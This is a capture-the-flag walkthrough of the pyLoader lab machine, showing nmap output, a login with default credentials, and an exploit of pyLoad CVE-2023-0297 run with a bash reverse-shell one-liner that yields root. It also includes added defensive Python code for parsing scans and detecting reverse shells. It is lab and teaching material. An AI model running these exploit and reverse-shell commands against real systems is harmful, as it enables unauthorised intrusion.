In this walkthrough, we will be going through the pyLoader room from Proving Grounds. This room is rated Intermediate on the platform and consists of exploiting pyLoad via CVE-2023-0297 to get root on the target. So, let’s get started without any delay.
Machine Info:
| Field | Value |
| --- | --- |
| Title | pyLoader |
| IP address | 192.168.169.29 |
| Difficulty | Intermediate |
| OS | Linux |
| Description | pyLoad is an Intermediate Linux machine which is vulnerable to CVE-2023-0297 and requires its exploitation to get root. |
Enumeration:
- I started off with a regular aggressive nmap scan (-A) and found only two ports open: 22 (SSH) and 9666 (HTTP).
```
$ sudo nmap -A 192.168.236.26
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-07 20:54 IST
Nmap scan report for 192.168.236.26
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
53/tcp   filtered domain
9666/tcp open     http    CherryPy wsgiserver
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Cheroot/8.6.0
| http-title: Login - pyLoad
|_Requested resource was /login?next=http://192.168.236.26:9666/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/7%OT=22%CT=1%CU=35039%PV=Y%DS=4%DC=T%G=Y%TM=65C3A0F9
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=2%ISR=10A%TI=Z%II=I%TS=A)SEQ(SP=10
OS:2%GCD=1%ISR=10A%TI=Z%TS=A)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11
OS:NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE8
OS:8%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)
OS:T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T5(R=N)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%
OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=8522%RUD=G)IE(R=Y%DFI=N%T=40%CD=S
OS:)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   201.36 ms 192.168.45.1
2   201.36 ms 192.168.45.254
3   202.21 ms 192.168.251.1
4   202.27 ms 192.168.236.26

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.58 seconds
```
- Enumerated the web server running on port 9666 and found the pyLoad application running on it, with a login panel on the home page.
- Logged into the pyLoad backend successfully with the default username and password combination, and noted the running pyLoad version: 0.5.0.
pyload: pyload
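The enumeration above rests on two observations from the scan output: the http-title script already names pyLoad, and the login page still accepts the default credentials. As an added example (not code from the original writeup), the script below parses the port table and NSE script lines from the nmap -A output shown above into structured records and flags an exposed pyLoad UI the way an internal asset review would. The embedded scan excerpt is copied from the output above with the OS fingerprint and traceroute sections dropped; the regexes, the `Service` record and the `review_exposure` wording are this example's own choices.

```python
import re
from dataclasses import dataclass, field

# Constructed sample for this example: the port table and NSE script lines of
# the nmap -A output shown in the enumeration section (OS fingerprint and
# traceroute sections dropped, since they carry no service information).
NMAP_OUTPUT = """\
Nmap scan report for 192.168.236.26
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
53/tcp   filtered domain
9666/tcp open     http    CherryPy wsgiserver
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Cheroot/8.6.0
| http-title: Login - pyLoad
|_Requested resource was /login?next=http://192.168.236.26:9666/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# "22/tcp   open     ssh     OpenSSH 8.9p1 ..." -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "| http-title: Login - pyLoad" / "|_http-server-header: Cheroot/8.6.0"
SCRIPT_RE = re.compile(r"^\|_?\s*([A-Za-z0-9_.-]+):\s*(.*)$")


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str = ""
    scripts: dict = field(default_factory=dict)  # NSE script name -> first output line


def parse_nmap(text):
    """Parse the human-readable port table into Service records.

    Script output lines ("| ..." / "|_...") are attached to the port entry
    that precedes them, which is how nmap prints them.
    """
    services = []
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = Service(int(m.group(1)), m.group(2), m.group(3),
                              m.group(4), m.group(5).strip())
            services.append(current)
            continue
        m = SCRIPT_RE.match(line)
        if m and current is not None:
            # keep the first line of each script's output only
            current.scripts.setdefault(m.group(1), m.group(2).strip())
    return services


def open_ports(services):
    return sorted(s.port for s in services if s.state == "open")


def review_exposure(services):
    """Flag services a defender should follow up on.

    pyLoad was identified on the page purely from its login page title, so
    the check keys on the http-title script output and reports the server
    header alongside it.
    """
    findings = []
    for s in services:
        if s.state != "open":
            continue
        title = s.scripts.get("http-title", "")
        server = s.scripts.get("http-server-header", "unknown")
        if "pyLoad" in title:
            findings.append(
                f"{s.port}/{s.proto}: pyLoad web UI exposed (title '{title}', "
                f"server {server}); verify the version is patched against "
                f"CVE-2023-0297 and that the default pyload credentials are changed"
            )
    return findings


if __name__ == "__main__":
    svcs = parse_nmap(NMAP_OUTPUT)
    print("open ports:", open_ports(svcs))
    for f in review_exposure(svcs):
        print("FINDING:", f)
```

On the excerpt above this reports open ports 22 and 9666 (53 is filtered, not open, so it is excluded) and one finding for 9666/tcp. For fleet-wide use, feeding nmap's `-oX` XML output to a proper XML parser is more robust than scraping the text table, but the text format is what the page shows.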
Exploitation & Getting root:
- Looked for known exploits for this application version and found that it is vulnerable to CVE-2023-0297, a pre-authentication remote code execution (RCE) vulnerability.
searchsploit pyload
- Used the exploit below against the target, specifying the target host and port number along with the command to execute, which was the bash reverse shell one-liner pointing at our listening IP and port. Once execution completes, we receive a connection back at our netcat listener as root.
Exploit – https://github.com/JacobEbben/CVE-2023-0297
python3 exploit.py -t 192.168.236.26:9666 -c 'bash -i >& /dev/tcp/192.168.45.215/4444 0>&1' -I 192.168.45.215 -P 4444
- Captured the root flag and marked the machine as complete.
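The reverse shell one-liner used above has a very recognisable shape in process telemetry: a shell launched by the application's Python runtime, running as root, with bash's /dev/tcp pseudo-device and an interactive flag in its command line. As an added detection example (not part of the original writeup), the script below scores constructed process-start events on those indicators. The sample events, the regexes, the weights and the alert threshold are this example's own assumptions, not output captured from the machine; only the last event reproduces the command shown in the exploitation step.

```python
import re
from dataclasses import dataclass


@dataclass
class ExecEvent:
    host: str
    user: str
    parent: str    # image name of the parent process
    cmdline: str


# Constructed sample telemetry for this example (not captured from the machine):
# process-start events as an auditd- or EDR-based pipeline might present them.
# Only the last one has the shape of the reverse shell used in the exploit step.
SAMPLE_EVENTS = [
    ExecEvent("pyloader", "root", "sshd", "bash -l"),
    ExecEvent("pyloader", "root", "bash", "bash -c 'systemctl status pyload'"),
    ExecEvent("pyloader", "root", "cron", "/bin/sh -c 'run-parts /etc/cron.hourly'"),
    ExecEvent("pyloader", "root", "python3", "sh -c 'ffmpeg -i in.mp4 out.mkv'"),
    ExecEvent("pyloader", "root", "python3",
              "bash -i >& /dev/tcp/192.168.45.215/4444 0>&1"),
]

# bash's /dev/tcp and /dev/udp pseudo-files: a bare shell opening a socket
DEV_TCP_RE = re.compile(r"/dev/(tcp|udp)/([^/\s]+)/(\d{1,5})")
# an interactive shell (-i) ...
INTERACTIVE_SHELL_RE = re.compile(r"\b(?:ba|z|da|k)?sh\b.*\s-i\b")
# ... whose stdin is tied back to stdout, so the remote end drives it
STDIN_LOOP_RE = re.compile(r"0>&1|0<&1")
# application runtimes that have no business launching a shell on this server
WEB_APP_PARENTS = {"python3", "python", "gunicorn", "uwsgi", "php-fpm", "node", "java"}
SHELL_IMAGE_RE = re.compile(r"^(?:/bin/|/usr/bin/)?(?:ba|z|da|k)?sh\b")

ALERT_THRESHOLD = 3   # chosen so a single weak indicator never alerts on its own


def score_event(ev):
    """Return (score, reasons) for one event; weights are this example's own choices."""
    reasons = []
    score = 0
    m = DEV_TCP_RE.search(ev.cmdline)
    if m:
        score += 3
        reasons.append(f"/dev/{m.group(1)} socket to {m.group(2)}:{m.group(3)} opened by a shell")
    if INTERACTIVE_SHELL_RE.search(ev.cmdline) and STDIN_LOOP_RE.search(ev.cmdline):
        score += 2
        reasons.append("interactive shell with stdin looped to stdout (reverse shell shape)")
    if ev.parent in WEB_APP_PARENTS and SHELL_IMAGE_RE.match(ev.cmdline):
        score += 1
        reasons.append(f"shell spawned by application runtime '{ev.parent}'")
    if ev.user == "root" and score:
        # only meaningful together with another indicator: root is the
        # symptom of the service not being run unprivileged
        score += 1
        reasons.append("process runs as root, so the service was not running unprivileged")
    return score, reasons


def detect(events, threshold=ALERT_THRESHOLD):
    """Return [(event, score, reasons)] for events at or above the threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


if __name__ == "__main__":
    for ev, score, reasons in detect(SAMPLE_EVENTS):
        print(f"[{score}] {ev.host} parent={ev.parent} user={ev.user}: {ev.cmdline}")
        for r in reasons:
            print("   -", r)
```

The fourth event is there on purpose: a download manager spawning a shell for a converter matches the "shell under python3" and "root" indicators, scores 2 and stays below the threshold, while the reverse shell scores on every indicator. The same events also point at the two mitigations the writeup implies: the service should not run as root, and outbound connections from the pyLoad host to arbitrary ports should be blocked or at least logged.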
Conclusion:
So that was “pyLoader” for you. We started off with a regular nmap scan and found two ports open: 22 (SSH) and 9666 (HTTP). Enumerated the web server running on port 9666 and found pyLoad running. Used the default username and password combination to log into the pyLoad backend successfully. In there, found out that it is running version 0.5.0. Looked for any known exploit and found it is vulnerable to CVE-2023-0297. At last, used the same to get root on the target. On that note, I would take your leave and will meet you in the next one. Till then, “Happy hacking”.